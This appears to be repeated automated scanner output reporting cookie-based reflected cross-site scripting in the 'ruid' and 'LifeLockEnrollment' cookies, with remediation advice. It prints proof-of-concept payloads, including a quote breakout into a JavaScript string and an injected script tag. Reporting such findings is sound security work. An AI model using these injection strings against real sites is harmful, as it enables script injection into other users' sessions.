The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee657"-alert(1)-"82b2db44a49 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f849a"-alert(1)-"de2ba14b2ac was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd5c6"-alert(1)-"83e1c532d15 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dbe7"><script>alert(1)</script>653af69f8df was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.